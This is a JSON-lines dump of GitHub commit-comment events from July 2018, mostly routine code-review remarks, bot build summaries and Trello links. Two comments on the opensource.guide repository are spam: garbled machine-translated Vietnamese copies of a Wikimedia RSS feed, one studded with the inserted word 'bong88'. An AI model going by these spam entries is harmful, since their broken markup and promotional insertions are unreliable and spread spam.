{"id":"8040599395","type":"CommitCommentEvent","actor":{"login":"bronxguy"},"repo":{"name":"nagarashish/hello-world"},"payload":{"comment":{"id":29894782,"position":null,"line":null,"path":null,"commit_id":"1dcc305ac8cf2b51c1fda89d13b6b73876e58b64","created_at":"2018-07-30T22:15:07Z","updated_at":"2018-07-30T22:15:07Z","author_association":"COLLABORATOR","body":"Hi!  This is comment about a  very simple project.  "}},"created_at":"2018-07-30T22:15:07Z"}
{"id":"8040608168","type":"CommitCommentEvent","actor":{"login":"technolom-python"},"repo":{"name":"technolom-python/cheker_api"},"payload":{"comment":{"id":29894811,"position":null,"line":null,"path":null,"commit_id":"828aec543ad881594e3b850129dd4d1c9d97b08c","created_at":"2018-07-30T22:17:19Z","updated_at":"2018-07-30T22:17:19Z","author_association":"OWNER","body":"Start project"}},"created_at":"2018-07-30T22:17:19Z"}
{"id":"8040612044","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894827,"position":44,"line":44,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/JwtTimestampTokenValidator.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:18:18Z","updated_at":"2018-07-30T22:18:18Z","author_association":"OWNER","body":"@jgrandja I know that you suggested `DefaultJwtValidator`. My concern with this is that this validator has a given purpose and should be configured in a targetted way by the user. Note in the DSL that, right now, I have two methods: `timingTokenValidator(JwtTimingTokenValidator)` and `addTokenValidators(OAuth2TokenValidator... validators)`. I want the configuration path for editing configuration for this validator to be clear and separate from other validators.\r\n\r\nIf we make it `DefaultJwtValidator`, I'm concerned that the constructor over time will be a catch-all for other configurations that are unrelated to one another. Today, it has clock skew, which lines up well with its intended purpose. However, if we put something atemporal in this validator, then the clock skew parameter starts to feel a bit legacy.\r\n\r\n@rwinch, do you have any additional insight on whether or not it would be better for this class to be more generic?"}},"created_at":"2018-07-30T22:18:18Z"}
{"id":"8040642152","type":"CommitCommentEvent","actor":{"login":"kirichoi"},"repo":{"name":"sys-bio/tellurium"},"payload":{"comment":{"id":29894896,"position":null,"line":null,"path":null,"commit_id":"be22e099674b7e99a32e39f8112a4af1cb07000c","created_at":"2018-07-30T22:26:17Z","updated_at":"2018-07-30T22:26:17Z","author_association":"CONTRIBUTOR","body":"Current Travis failure is due to new setValues testing implemented in roadrunner which is fixed in https://github.com/sys-bio/roadrunner/commit/a4fb0c3cd74fedae921f064dfd77295a6b97cf5f"}},"created_at":"2018-07-30T22:26:17Z"}
{"id":"8040642565","type":"CommitCommentEvent","actor":{"login":"rbiasini"},"repo":{"name":"emmertex/openpilot"},"payload":{"comment":{"id":29894898,"position":30,"line":30,"path":"panda/board/safety/safety_hyundai.h","commit_id":"292f505c7fc05d0925336de82770fcb004521db8","created_at":"2018-07-30T22:26:24Z","updated_at":"2018-07-30T22:26:24Z","author_association":"NONE","body":"looks right"}},"created_at":"2018-07-30T22:26:24Z"}
{"id":"8040643765","type":"CommitCommentEvent","actor":{"login":"mixmix"},"repo":{"name":"blockades/scuttle-dark-crystal"},"payload":{"comment":{"id":29894901,"position":34,"line":43,"path":"test/request/async/request.test.js","commit_id":"77fc3a7632fbcaa9efd10aa633f4f85448c50d48","created_at":"2018-07-30T22:26:43Z","updated_at":"2018-07-30T22:26:43Z","author_association":"MEMBER","body":"I trust scuttle-invte to publish invites correctly, so we probably don't need to worry about checking what comes back.\r\n\r\nas far as parsing results after publishing, I'm really not sure. I don't know what the use case for that is. Generally (I think?) when you publish you don't immediately need things back in a parsed form, because you were the one who put them in so you already have that data? Could be wrong though"}},"created_at":"2018-07-30T22:26:43Z"}
{"id":"8040646521","type":"CommitCommentEvent","actor":{"login":"henryqdineen"},"repo":{"name":"reach/router"},"payload":{"comment":{"id":29894919,"position":15,"line":129,"path":"src/index.js","commit_id":"754e2a67330e14d05cf0628f93f57262bf3bca1c","created_at":"2018-07-30T22:27:29Z","updated_at":"2018-07-30T22:27:29Z","author_association":"NONE","body":"Can you help me understand why `Promise.resolve().then()` is needed here? Much appreciated :)"}},"created_at":"2018-07-30T22:27:29Z"}
{"id":"8040647667","type":"CommitCommentEvent","actor":{"login":"mortberg"},"repo":{"name":"mortberg/cubicaltt"},"payload":{"comment":{"id":29894923,"position":null,"line":null,"path":null,"commit_id":"130165cba5b214b0eda70ce46b131f7ce581df15","created_at":"2018-07-30T22:27:48Z","updated_at":"2018-07-30T22:27:48Z","author_association":"OWNER","body":"@CohenCyril Experimenting... If I do this things compute faster and it should be fine for numbers in a closed context, but it breaks typechecking as it doesn't work in general in an open context. I hence put it in a comment so that I can easily activate it locally after switching off the typechecker... Welcome to hackerville!"}},"created_at":"2018-07-30T22:27:48Z"}
{"id":"8040648857","type":"CommitCommentEvent","actor":{"login":"dragg"},"repo":{"name":"Praddby/LearningLanguageWithFlashcards"},"payload":{"comment":{"id":29894927,"position":10,"line":33,"path":"app/CardGroup.php","commit_id":"d5ff560de86289b0ae60f3def878ba2702f9ade7","created_at":"2018-07-30T22:28:08Z","updated_at":"2018-07-30T22:28:08Z","author_association":"COLLABORATOR","body":"Ты так и не понял, что здесь scope как префикс не нужен. Это работает конечно, но не так как задумывалось. Scoup обычно используется для составления запросов, а не для принесения изменений. А в коде, где ты используешь следует вызвать `$cardGroup->setStandard()->save();`"}},"created_at":"2018-07-30T22:28:08Z"}
{"id":"8040655331","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29894941,"position":null,"line":null,"path":null,"commit_id":"e3c8cbdbe64a2e77044af5e4303e9e139daa9865","created_at":"2018-07-30T22:29:51Z","updated_at":"2018-07-30T22:29:51Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/e3c8cbdbe64a2e77044af5e4303e9e139daa9865)\n\nBuilt at __20180730 - 22:29:51__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [console](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//console) | no test results, t: n/a | FAIL :red_circle: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Debug_Dcoverage_ON.txt) | no test results, t: 39s | FAIL :red_circle: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [console](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//console) | no test results, t: n/a | FAIL :red_circle: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | no test results, t: 88s | FAIL :red_circle: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/clang.Debug.txt) | no test results, t: 31s | FAIL :red_circle: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Debug.txt) | no test results, t: 40s | FAIL :red_circle: \nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/rpm.txt) | no test results, t: n/a | FAIL :red_circle: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 529s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/clang.Release_Dassert_ON.txt) | no test results, t: 76s | FAIL :red_circle: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 731s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Debug_Dstatic_OFF.txt) | no test results, t: 39s | FAIL :red_circle: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Release_Dassert_ON.txt) | no test results, t: 88s | FAIL :red_circle: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Debug_NINJA_BUILD_true.txt) | no test results, t: 36s | FAIL :red_circle: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | no test results, t: 39s | FAIL :red_circle: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1213s | PASS :white_check_mark: \nmsvc.Release | [console](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//console) | no test results, t: n/a | FAIL :red_circle: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 892s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-delgroup/1//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1206s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-30T22:29:51Z"}
{"id":"8040656231","type":"CommitCommentEvent","actor":{"login":"jimmyachour"},"repo":{"name":"jimmyachour/tp-app-poo"},"payload":{"comment":{"id":29894949,"position":13,"line":61,"path":"lib/OCFram/Page.php","commit_id":"cfdcb274242419c99e1ca30df8de10ab6b9edfa8","created_at":"2018-07-30T22:30:05Z","updated_at":"2018-07-30T22:30:05Z","author_association":"OWNER","body":"méthode de base sur ce framework , accesseur \"Get\""}},"created_at":"2018-07-30T22:30:05Z"}
{"id":"8040660907","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29894963,"position":null,"line":null,"path":null,"commit_id":"845588dd6c5ea6076997f1d269b6d822dc407e20","created_at":"2018-07-30T22:31:18Z","updated_at":"2018-07-30T22:31:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Redesign interface](https://trello.com/c/i8P3sMYL/34-redesign-interface)"}},"created_at":"2018-07-30T22:31:18Z"}
{"id":"8040661454","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29894965,"position":null,"line":null,"path":null,"commit_id":"845588dd6c5ea6076997f1d269b6d822dc407e20","created_at":"2018-07-30T22:31:27Z","updated_at":"2018-07-30T22:31:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Use new error system and async funcs for routes](https://trello.com/c/W6MaLB6m/35-use-new-error-system-and-async-funcs-for-routes)"}},"created_at":"2018-07-30T22:31:27Z"}
{"id":"8040661979","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29894966,"position":null,"line":null,"path":null,"commit_id":"845588dd6c5ea6076997f1d269b6d822dc407e20","created_at":"2018-07-30T22:31:35Z","updated_at":"2018-07-30T22:31:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor following new course info](https://trello.com/c/iyE9J7z1/32-refactor-following-new-course-info)"}},"created_at":"2018-07-30T22:31:35Z"}
{"id":"8040661985","type":"CommitCommentEvent","actor":{"login":"pedroalvesbatista"},"repo":{"name":"IoTone/TheShellProject"},"payload":{"comment":{"id":29894967,"position":null,"line":null,"path":null,"commit_id":"1b40b6d12b8bf5039394eef568ed69fffaa0fba2","created_at":"2018-07-30T22:31:35Z","updated_at":"2018-07-30T22:31:35Z","author_association":"NONE","body":"Maybe here we will need to convert from uchar to ubyte, no ? Or is for the better to continue to work with ubytes ?"}},"created_at":"2018-07-30T22:31:35Z"}
{"id":"8040663644","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29894978,"position":null,"line":null,"path":null,"commit_id":"845588dd6c5ea6076997f1d269b6d822dc407e20","created_at":"2018-07-30T22:32:03Z","updated_at":"2018-07-30T22:32:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Use env variables for client](https://trello.com/c/WK5RAOvW/11-use-env-variables-for-client)"}},"created_at":"2018-07-30T22:32:03Z"}
{"id":"8040664902","type":"CommitCommentEvent","actor":{"login":"6777943"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29894987,"position":2,"line":160,"path":"_articles/es/legal.md","commit_id":"5e3b8a4ccc23fb352b7d93d15417730746bdbf64","created_at":"2018-07-30T22:32:25Z","updated_at":"2018-07-30T22:32:25Z","author_association":"NONE","body":"xml version = \"1.0\" encoding = \"UTF-8\"?> <rss phiên bản = \"2.0\"\r\n\txmlns: content = \"http://purl.org/rss/1.0/modules/content/\"\r\n\txmlns: wfw = \"http://wellformedweb.org/CommentAPI/\"\r\n\txmlns: dc = \"http://purl.org/dc/elements/1.1/\"\r\n\txmlns: atom = \"http://www.w3.org/2005/Atom\"\r\n\txmlns: sy = \"http://purl.org/rss/1.0/modules/syndication/\"\r\n\txmlns: slash = bong88\"http://purl.org/rss/1.0/modules/slash/\"\r\n\txmlns: georss = bong88\"http://www.georss.org/georss\" xmlns: geo = \"http://www.w3.org/2003/01/geo/wgs84_pos#\" xmlns: media = \"http: // bong8search.yahoo.com/mrss/ \"\r\n\t>\r\n\r\n<channel>\r\n\t<title> Blog Wikimedia </ title>\r\n\t<atom: link href = bong88\"https://blog.wikimedia.org/feed/\" rel = \"self\" type = \"application / rss + xml\" />\r\n\t<link> https://blog.wikimedia.org </ link>\r\n\t<description> Tin tức từ Wikipedia và phong trào Wikimedia </ description>\r\n\t<lastBuildDate> Thứ Hai, ngày 30 tháng 7 năm 2018 21:47:18 +0000 </ lastBuildDate>bong88\r\n\t<language> vi </ language>\r\n\t<sy: updatePeriod> hàng giờ </ sy: updatePeriod>=1\r\n\t<sy: updateFrequency> 1 </ sy: updateFrequency>\r\n\t<generator> http://wordpress.com/ </ generator>\r\n<cloud domain = 'blog.wikimedia.org' port = '80 'path =' /? rsscloud = thông báo 'registerProcedure =' 'protocol =' http-post '/>\r\n<image>\r\n\t\t<url> https://secure.gravatar.com/blavatar/eef32d7d5b09256c35970b4ac4263f94?s=96&d=https%3A%2F%2Fs0.wp.com%2Fi%2Fbuttonw-com.png </ url>\r\n\t\t<title> Blog Wikimedia </ title>\r\n\t\t<link> https://blog.wikimedia.org </ link>bong88\r\n\t</ image>\r\n\t<atom: link rel = \"search\" type = \"application / opensearchdescription + xml\" href = \"https://blog.wikimedia.org/osd.xml\" title = \"Wikimedia Blog\" />\r\n\t<atom: link rel = 'hub' href = 'https: //blog.wikimedia.org/? pushpress = hub' />\r\n\t<item>\r\n\t\t<title> Farkhad Fatkullin có tên Wikimedian của năm cho năm 2018 </ title>\r\n\t\t<link> bong88https://blog.wikimedia.org/2018/07/26/farkhad-fatkullin-wikimedian-of-the-year/ </ link>\r\n\t\t<comments> https://blog.wikimedia.org/2018/07/26/farkhad-fatkullin-wikimedian-of-the-year/#comments </ comments>\r\n\t\t<pubDate> Thu, ngày 26 tháng 7 năm 2018 16:03:49 +0000 </ pubDate>\r\n\t\t<dc: người tạo> <! [CDATA [Samir Elsharbaty]]> </ dc: người sáng tạo>\r\n\t\t\t\t<category> <! [CDATA [Giao tiếp]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Cộng đồng]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Từ lưu trữ]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Wikimania]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Wikimania 2018]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Wikimedian của năm]]> </ danh mục>\r\n\r\n\t\t<guid isPermaLink = \"false\"> http://blog.wikimedia.org/?p=56422 </ guid>\r\n\t\t<description> <! [CDATA [Nhà sáng lập Wikipedia Jimmy Wales đặt tên Farkhad Fatkullin là Wikimedian năm 2018 của năm.]]> </ description>\r\n\t\t\t\t<content: encoded> <! [CDATA [<div id = \"attachment_56423\" class = \"hình ảnh sau -pile phụ đề aligncenter\" style = \"width: 590px\"> <a href = \"https://blog.wikimedia.org / 2018/07/26 / farkhad-fatkullin-wikimedian-of-the-year / farkhad_fatkullin / \"rel =\" tệp đính kèm wp-att-56423 \"> <img dữ liệu-tệp đính kèm-id =\" 56423 \"dữ liệu-permalink =\" https : //blog.wikimedia.org/2018/07/26/farkhad-fatkullin-wikimedian-of-the-year/farkhad_fatkullin/ \"data-orig-file =\" https://wikimediablog.files.wordpress.com/2018 /07/farkhad_fatkullin.jpg \"dữ liệu-orig-size =\" 5608,3739 \"dữ liệu-nhận xét-mở =\" 1 \"dữ liệu-hình ảnh-meta =\" {& quot; khẩu độ & quot;: & quot; 5.6 & quot ;, & quot; tín dụng & quot; : & quot; & quot;, & quot; máy ảnh & quot;: & quot; Canon EOS 5D Mark III && quot; & quot; Tiêu đề 2000 & quot ;, & quot; shutter_speed & quot;: & quot; 0,00 & quot ;, & quot; tiêu đề & quot;: & quot; & quot ;, & quot; & quot;: & quot; 0 & quot;} \"data-image-title =\" Farkhad_Fatkullin \"data-image-description = \"\" data-medium-file = \"https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=300\" dữ liệu-large-file = \"https: //wikimediablog.files.wordpress. com / 2018/07 / farkhad_fatkullin.jpg? w = 580 & # 038; h = 387 \"class =\" kích thước lớn wp-image-56423 \"src =\" https: //wikimediablog.files.wordpress.com / 2018/07 / farkhad_fatkullin.jpg? w = 580 & # 038; h = 387 \"alt =\" \"width =\" 580 \"chiều cao =\" 387 \"srcset =\" https://wikimediablog.files.wordpress.com/2018 /07/farkhad_fatkullin.jpg?w=580&h=387 580w, https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=1160&h=774 1160w, https: // wikimediablog .files.wordpress.com / 2018/07 / farkhad_fatkullin.jpg? w = 150 & amp; h = 100 150w, https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=300&h= 200 300w, https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=768&h=512 768w \"sizes =\" (chiều rộng tối đa: 580px) 100vw, 580px \"/> </ a> <p class = \"wp-chú thích-văn bản\"> <a href=\"https://commons.wikimedia.org/wiki/File:Farkhad_Fatkullin.jpg\"> Ảnh </a>của Victor Grigas / Wikimedia Foundation, <a href=\"https://creativecommons.org/licenses/by-sa/3.0/deed.en\"> CC BY-SA 3.0 </a>. </ p> </ div >\r\n<p> Trong lễ bế mạc Wikimania năm nay, <a href=\"https://wikimania2018.wikimedia.org/wiki/Wikimania\"> được tổ chức tại Cape Town </a>, người sáng lập Wikipedia Jimmy Wales đã thông báo <a href = \"https://commons.wikimedia.org/wiki/User:Frhdkazan\">Farkhad Fatkullin </a> là Wikimedian của năm cho năm 2018. Fatkullin được chọn vì những nỗ lực hỗ trợ cộng đồng ngôn ngữ thiểu số ở Nga. < / p>\r\n<p> \"Farhad là cộng đồng năng động trong cộng đồng ngôn ngữ thiểu số của Nga\", <a href=\"https://www.youtube.com/watch?v=Jys_0QVqtPw&t=45m51s\"> cho biết Wales </a>, “ đi xa và rộng hơn Tatar bản địa của mình. Ông cũng thông thạo tiếng Anh, một thực tế cuối cùng đã thiết lập một cầu nối giữa các cộng đồng đó và phong trào rộng hơn sau nhiều"}},"created_at":"2018-07-30T22:32:25Z"}
{"id":"8040666021","type":"CommitCommentEvent","actor":{"login":"6777943"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29894989,"position":5,"line":155,"path":"_articles/zh-cn/legal.md","commit_id":"5e3b8a4ccc23fb352b7d93d15417730746bdbf64","created_at":"2018-07-30T22:32:43Z","updated_at":"2018-07-30T22:32:43Z","author_association":"NONE","body":"xml version = \"1.0\" encoding = \"UTF-8\"?> <rss phiên bản = \"2.0\"\r\n\txmlns: content = \"http://purl.org/rss/1.0/modules/content/\"\r\n\txmlns: wfw = \"http://wellformedweb.org/CommentAPI/\"\r\n\txmlns: dc = \"http://purl.org/dc/elements/1.1/\"\r\n\txmlns: atom = \"http://www.w3.org/2005/Atom\"\r\n\txmlns: sy = \"http://purl.org/rss/1.0/modules/syndication/\"\r\n\txmlns: slash = \"http://purl.org/rss/1.0/modules/slash/\"\r\n\txmlns: georss = \"http://www.georss.org/georss\" xmlns: geo = \"http://www.w3.org/2003/01/geo/wgs84_pos#\" xmlns: media = \"http: // search.yahoo.com/mrss/ \"\r\n\t>\r\n\r\n<channel>\r\n\t<title> Blog Wikimedia </ title>\r\n\t<atom: link href = \"https://blog.wikimedia.org/feed/\" rel = \"self\" type = \"application / rss + xml\" />\r\n\t<link> https://blog.wikimedia.org </ link>\r\n\t<description> Tin tức từ Wikipedia và phong trào Wikimedia </ description>\r\n\t<lastBuildDate> Thứ Hai, ngày 30 tháng 7 năm 2018 21:47:18 +0000 </ lastBuildDate>\r\n\t<language> vi </ language>\r\n\t<sy: updatePeriod> hàng giờ </ sy: updatePeriod>\r\n\t<sy: updateFrequency> 1 </ sy: updateFrequency>\r\n\t<generator> http://wordpress.com/ </ generator>\r\n<cloud domain = 'blog.wikimedia.org' port = '80 'path =' /? rsscloud = thông báo 'registerProcedure =' 'protocol =' http-post '/>\r\n<image>\r\n\t\t<url> https://secure.gravatar.com/blavatar/eef32d7d5b09256c35970b4ac4263f94?s=96&d=https%3A%2F%2Fs0.wp.com%2Fi%2Fbuttonw-com.png </ url>\r\n\t\t<title> Blog Wikimedia </ title>\r\n\t\t<link> https://blog.wikimedia.org </ link>\r\n\t</ image>\r\n\t<atom: link rel = \"search\" type = \"application / opensearchdescription + xml\" href = \"https://blog.wikimedia.org/osd.xml\" title = \"Wikimedia Blog\" />\r\n\t<atom: link rel = 'hub' href = 'https: //blog.wikimedia.org/? pushpress = hub' />\r\n\t<item>\r\n\t\t<title> Farkhad Fatkullin có tên Wikimedian của năm cho năm 2018 </ title>\r\n\t\t<link> https://blog.wikimedia.org/2018/07/26/farkhad-fatkullin-wikimedian-of-the-year/ </ link>\r\n\t\t<comments> https://blog.wikimedia.org/2018/07/26/farkhad-fatkullin-wikimedian-of-the-year/#comments </ comments>\r\n\t\t<pubDate> Thu, ngày 26 tháng 7 năm 2018 16:03:49 +0000 </ pubDate>\r\n\t\t<dc: người tạo> <! [CDATA [Samir Elsharbaty]]> </ dc: người sáng tạo>\r\n\t\t\t\t<category> <! [CDATA [Giao tiếp]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Cộng đồng]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Từ lưu trữ]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Wikimania]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Wikimania 2018]]> </ danh mục>\r\n\t\t<category> <! [CDATA [Wikimedian của năm]]> </ danh mục>\r\n\r\n\t\t<guid isPermaLink = \"false\"> http://blog.wikimedia.org/?p=56422 </ guid>\r\n\t\t<description> <! [CDATA [Nhà sáng lập Wikipedia Jimmy Wales đặt tên Farkhad Fatkullin là Wikimedian năm 2018 của năm.]]> </ description>\r\n\t\t\t\t<content: encoded> <! [CDATA [<div id = \"attachment_56423\" class = \"hình ảnh sau -pile phụ đề aligncenter\" style = \"width: 590px\"> <a href = \"https://blog.wikimedia.org / 2018/07/26 / farkhad-fatkullin-wikimedian-of-the-year / farkhad_fatkullin / \"rel =\" tệp đính kèm wp-att-56423 \"> <img dữ liệu-tệp đính kèm-id =\" 56423 \"dữ liệu-permalink =\" https : //blog.wikimedia.org/2018/07/26/farkhad-fatkullin-wikimedian-of-the-year/farkhad_fatkullin/ \"data-orig-file =\" https://wikimediablog.files.wordpress.com/2018 /07/farkhad_fatkullin.jpg \"dữ liệu-orig-size =\" 5608,3739 \"dữ liệu-nhận xét-mở =\" 1 \"dữ liệu-hình ảnh-meta =\" {& quot; khẩu độ & quot;: & quot; 5.6 & quot ;, & quot; tín dụng & quot; : & quot; & quot;, & quot; máy ảnh & quot;: & quot; Canon EOS 5D Mark III && quot; & quot; Tiêu đề 2000 & quot ;, & quot; shutter_speed & quot;: & quot; 0,00 & quot ;, & quot; tiêu đề & quot;: & quot; & quot ;, & quot; & quot;: & quot; 0 & quot;} \"data-image-title =\" Farkhad_Fatkullin \"data-image-description = \"\" data-medium-file = \"https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=300\" dữ liệu-large-file = \"https: //wikimediablog.files.wordpress. com / 2018/07 / farkhad_fatkullin.jpg? w = 580 & # 038; h = 387 \"class =\" kích thước lớn wp-image-56423 \"src =\" https: //wikimediablog.files.wordpress.com / 2018/07 / farkhad_fatkullin.jpg? w = 580 & # 038; h = 387 \"alt =\" \"width =\" 580 \"chiều cao =\" 387 \"srcset =\" https://wikimediablog.files.wordpress.com/2018 /07/farkhad_fatkullin.jpg?w=580&h=387 580w, https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=1160&h=774 1160w, https: // wikimediablog .files.wordpress.com / 2018/07 / farkhad_fatkullin.jpg? w = 150 & amp; h = 100 150w, https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=300&h= 200 300w, https://wikimediablog.files.wordpress.com/2018/07/farkhad_fatkullin.jpg?w=768&h=512 768w \"sizes =\" (chiều rộng tối đa: 580px) 100vw, 580px \"/> </ a> <p class = \"wp-chú thích-văn bản\"> <a href=\"https://commons.wikimedia.org/wiki/File:Farkhad_Fatkullin.jpg\"> Ảnh </a>của Victor Grigas / Wikimedia Foundation, <a href=\"https://creativecommons.org/licenses/by-sa/3.0/deed.en\"> CC BY-SA 3.0 </a>. </ p> </ div >\r\n<p> Trong lễ bế mạc Wikimania năm nay, <a href=\"https://wikimania2018.wikimedia.org/wiki/Wikimania\"> được tổ chức tại Cape Town </a>, người sáng lập Wikipedia Jimmy Wales đã thông báo <a href = \"https://commons.wikimedia.org/wiki/User:Frhdkazan\">Farkhad Fatkullin </a> là Wikimedian của năm cho năm 2018. Fatkullin được chọn vì những nỗ lực hỗ trợ cộng đồng ngôn ngữ thiểu số ở Nga. < / p>\r\n<p> \"Farhad là cộng đồng năng động trong cộng đồng ngôn ngữ thiểu số của Nga\", <a href=\"https://www.youtube.com/watch?v=Jys_0QVqtPw&t=45m51s\"> cho biết Wales </a>, “ đi xa và rộng hơn Tatar bản địa của mình. Ông cũng thông thạo tiếng Anh, một thực tế cuối cùng đã thiết lập một cầu nối giữa các cộng đồng đó và phong trào rộng hơn sau nhiều"}},"created_at":"2018-07-30T22:32:43Z"}
{"id":"8040666907","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29894991,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T22:32:58Z","updated_at":"2018-07-30T22:32:58Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T22:32:58Z"}
{"id":"8040667399","type":"CommitCommentEvent","actor":{"login":"Setubal18"},"repo":{"name":"lpweb20182/lpweb20182-noticias-js-plus-Setubal18"},"payload":{"comment":{"id":29894996,"position":null,"line":null,"path":null,"commit_id":"1594377f681a599ec8e5d3c567499e1fb42df2f8","created_at":"2018-07-30T22:33:07Z","updated_at":"2018-07-30T22:33:07Z","author_association":"COLLABORATOR","body":"Pode deixar."}},"created_at":"2018-07-30T22:33:07Z"}
{"id":"8040670368","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"xXAndrew28Xx/Conquer"},"payload":{"comment":{"id":29894999,"position":5,"line":23,"path":"build.gradle","commit_id":"a0a25ad1b54441dabd26cec21a04a5ea0e48734d","created_at":"2018-07-30T22:33:58Z","updated_at":"2018-07-30T22:33:58Z","author_association":"NONE","body":"Cheers from the stream"}},"created_at":"2018-07-30T22:33:58Z"}
{"id":"8040670689","type":"CommitCommentEvent","actor":{"login":"LiseWilson"},"repo":{"name":"charltonaustin/blog-entries"},"payload":{"comment":{"id":29895000,"position":5,"line":4,"path":"editing/hope-conference-2018.md","commit_id":"f778c7492ae48c4f35312ef49c965cadb87eef85","created_at":"2018-07-30T22:34:04Z","updated_at":"2018-07-30T22:34:04Z","author_association":"COLLABORATOR","body":"People \"who\"  not people \"that\"   Sorry I missed that.  "}},"created_at":"2018-07-30T22:34:04Z"}
